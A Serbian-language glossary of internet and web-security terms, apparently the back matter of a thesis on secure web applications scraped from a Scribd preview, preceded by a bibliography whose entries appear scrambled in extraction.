Izhar By-Gad."Professional PHP Web Services".org 3. Dennis Groves. Wrox Press 2003. Mark Curphey. Alex Russell."Criptography and Network Security: Principles and Practice". James Fuller."A Guide to Building Secure Web Applications" . Inc. www.Tehnički članci "CERT – Coordination Center" Carnegie Mellon Software Engineering Institute. Ken Egervari. LITERATURA 1. Prentice-Hall. OWASP 2002. William Stallings. Jon Stephens. Steve Taylor. Richard Parke. Gene McKenna. David Endler. Sverre Huseby. William Hau.The Open Web Application Security Project. 4. New Jersey 1998. Tim Smith. Daniel Solin. 46 . Martin Eizner. Upper Saddle River.cert. and Roy McNamara. Amit Klien.10. 2. Nigel Tranter. Lee Reynolds. Martin Eizner. Harry Fuecks. Kevin McLaughlin. Bryan Waters.

najcešce pitana pitanja vezana za neku temu.jedinstveno ime domena na Internetu. Oracle. CA – certifikaciono telo ili autoritet od poverenja.'kolačić' je jedna vrsta zapisa koji moze da ostane na računaru (u zavisnosti od podešavanja samog browsera) i šalje se svaki put na Web Server kada browser pristupa određenom sajtu.server koji vrši razlučivanje logičkih imena korisnika ili servisa na mreži u IP adrese i obrnuto. (Pogledati www. Imena domena mogu biti različita npr. slanje poruka ili fajlova od jednog Internet korisnika do drugog (ili za više korisnika).. 47 . zvukovi.com i www. On moze sadržati informacije o korisniku kao sto su ime.. Sybase. interakciju i komunikaciju sa Web stranicom.uslužni program koji korisniku pruza prikazivanje. program sposoban da detektuje viruse i "očisti" ih sa sistema. Sybase SQL Anywhere.REČNIK ADOdb library – database biblioteka. Foxpro.. Antivirusni program (AV program)..Common Gateway Interface. E-mail . FAQ . CGI . ADO i ODBC.com). FrontBase.net Domain name server (DNS) . standardizovana programska tehnologija koja omogućava preko Weba promenu podataka na Web Serveru (uglavnom iz neke forme) tom prilikom obrađujuje podatke i vraća neku vrstu rezultata.verisign. Postoje one koje podrzavaju samo text i druge koji podrzavaju text. PHP funkcije za pristup bazama podataka nisu standardizovane. ADOdb trenutno podržava MySQL. da bi sa lakoćom menjali baze podataka. Cookie . To stvara potrebu za database bibliotekom da smanji razlike između različitih database API-a.uglavom je to direktorijum koji sadrži određene CGI programe na Web Serveru. prezime .thawte. Domain name . Browser (Web browser) . Download . Interbase (Firebird i Borland varijante). tekst i ostale različite vrste fajlova. grafiku i ostalo.Proces kopiranja nekih podataka kao sto su slike. Access.Poznata i kao elektronska pošta.Frequantly Asked Questions. Microsoft SQL Server. kraftweb. PostgreSQL. Cgi-bin . Informix.

Internet (Net) .Generalno posmatrano. a kod kojih nije neophodno poznavanje ovog jezika ali ipak prikazuju sam HTML kod. dozvoljava browseru da pristupi Web serveru na bilo kom kompjuteru kada koriste isti 'jezik'.Firewall . Koristi se kao sredstvo za smanjenje rizika od neželjenog pristupa sistemu ili lokalnom računaru.Internet Protocol.Hypertext Markup Language. Haker . on sadrži sve tekstove koji u sebi sadrže linkove ka drugim dokumentima. ali u svrhu kriptografije moraju ispuniti dodatne zahteve. GET – HTTP GET metod čija je funkcija slanje podataka od HTTP klijenta do servera. Ovim protokol kojim je moguće preuzeti sadržaj nekog drugog sajta sa odgovarajućim korisničkim imenom i šifrom. FTP . koji implementira asimetričnu kriptografiju. besplatni klon komercijalnog PGP. 48 .File Transfer Protocol. veliki broj mreža međusobno povezanih komjutera telefonskim žicama. protokol kojim su definisana pravila za cirkulaciju hypertext fajlova na Internetu. HTML .Računar koji je povezan na mrežu i obezbeđuje određene servise za korisnike te mreže. Ovako definisane hash funkcije mogu imati generalnu računsku primenu. Hosting provider . IP .Mreža svih mreža. kablovima i satelitima koji pruzaju pristup i medjusobnu razmenu informacija. deo TCP/IP grupe protokola. HTTP . Hash funkcije – Hash funkcija H(x) je transformacija poruke proizvoljne dužine u hash vrednost h = H(x) tačno definisane dužine. jasno definisan metod prezentovanja tekstualnih i multimedijalnih materijala za uporebu na World Wide Web-u. protokol koji se koristi za prenošenje fajlova od korisnika do Web stranica i obrnuto. Postoje mnogi novi korisnicki programi koji sluze za izdravu Web prezetnacija. GnuPG – Gnu Privacy Guard. neformalna mreža koja povezuje veliki deo svetskih kompjuterskih mreža.Firma koja pruža usluge hostovanja Internet prezentacija. osnovni protokol za razmenu podataka preko Interneta. Podaci se prenose preko URL-a. Host .je sistem dizajniran da kontroliše protok informacija između lokalnog hosta i bilo kog udaljenog hosta na mreži. jezik uz pomoc koga se kreiraju stranice koje se koriste na World Wide Webu.osoba koja pokušava da probije zaštitu na računarskom sistemu. Hypertext .Hypertext Transport Protocol. bolje rečeno ovaj protokol.

firma koja pruža Internet usluge.odnosi se na vremenski period kada ste povezani na Internet Password . InfoSky je ISP firme Informatika Java . što znači da može biti verifikovan samo od određenog korisnika.lozinka kojom se korisnik (uz korisničko ime) služi za identifikaciju na mreži. Meta karakteri mogu biti kodirani na način koji nije lako uočljiv. Uklanjanje html tagova) veoma bitna.služi za identifikaciju lokacije svakog člana mreže ISP . komercijalni softver za implementaciju asimetrične kriptografije PHP – Hypertext Processor. MAC – Autentifikacioni kod poruke (Message Authentication Code) je autentifikaciona reč izvedena iz poruke korišćenjem tajnog ključa. Internet posrednički centar. slika. POP3 . kao na i upite baza podataka.tačka kroz koju podaci mogu ući ili napustiti mrežu.Odredjena deonica jedne Web strane (tekst. PGP – Pretty Good Privacy. servisa i standarda za podršku aplikacijama koje koriste kriptografiju sa javnim ključem.Internet Service Provider. specijalno aplikativan za World Wide Web.veliki broj email-ova poslatih jednoj osobi ili sistemu sa ciljem da prouzrokuje pad servera. tako da je kanonizacija podataka (pretvaranje u standardne karaktere) pre stripping-a (npr.Objektno orijentisan programski jezik.karakteri koji utiču na ponašanje naredbi programskog jezika.IP adresa . Meta karakteri . bilo sta) koja upućuje na drugu Web stranicu. MD5 – Hash funkcija. skript jezik za izradu Web aplikacija. Mail bomb . protokol koji se koristi za preuzimanje email-ova Port . Za razliku od digitalnog potpisa MAC se poredi i verifikuje pomoću istog ključa. naredbi operativnog sistema. PKI – Infrastruktura kriptografije sa javnim ključem (Public Key Infrastructure) predstavlja skup protokola. Link . razvijen 1990 od korporacije Sun Microsystems.Post Office Protocol.četiri broja između 0 i 255 međusobno odvojenih tačkom. pojedinačnih programskih procedura. On-line . 49 .

napravljen da zaobidje sigurnosnu zaštitu na sistemu. izazivajući štetu na njima i sistemu uopšte.Simple Mail Transfer Protocol. knjiga.. Server . Surf . TCP/IP . slušanje muzike. 50 . Virus . uglavnom oglasnog tipa ili korisničke usluge.uređaj koji omogućava povezivanje nekoliko regiona (podmreža) u jednu mrežu. World Wide Web . Zabranjena radnja. Router . WWW nije Internet vec predstavlja samo njegov deo. koji nosi informaciju sa kog domena se upućuje HTTP zahtev. URL .računar koji čuva informacije koje se dele širom mreze i odgovara na zahteve za informacijama od strane klijenata. SMTP . naizgled bezopasan program klijent-server tipa.Dodatni program koji se izvršava unutar Browsera dajući mu dodatne mogućnosti pregleda određenih tipova dokumenata: gledanje video klipova.Uniform Resource Locator. skup protokola za komunikaciju na Internetu Trojanski konj (Trojan horse. Podaci se prenose u telu HTTP zahteva. Plug-in . zvukova. kontrolišući mrežni saobraćaj između njih. na Web stranicama povezanih preko Interneta.Programski kod koji ima sposobnost razmnožavanja.Transmision Control Protocol/ Internet Protocol. Referer – parametar HTTP zaglavlja. protokol koji se koristi za slanje email-ova Spam . filmova. slika.neželjeni email koji je poslat za više korisnika odjednom. tako što "zakači" svoje kopije za druge fajlove na sistemu. ili popularnije zvana Internet adresa..WWW .izraz koji opisuje gledanje Web sajtova na Internetu.Kolekcija tekstova. Trojan).POST – HTTP POST metod čija je funkcija slanje podataka od HTTP klijenta do servera.

51 .

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->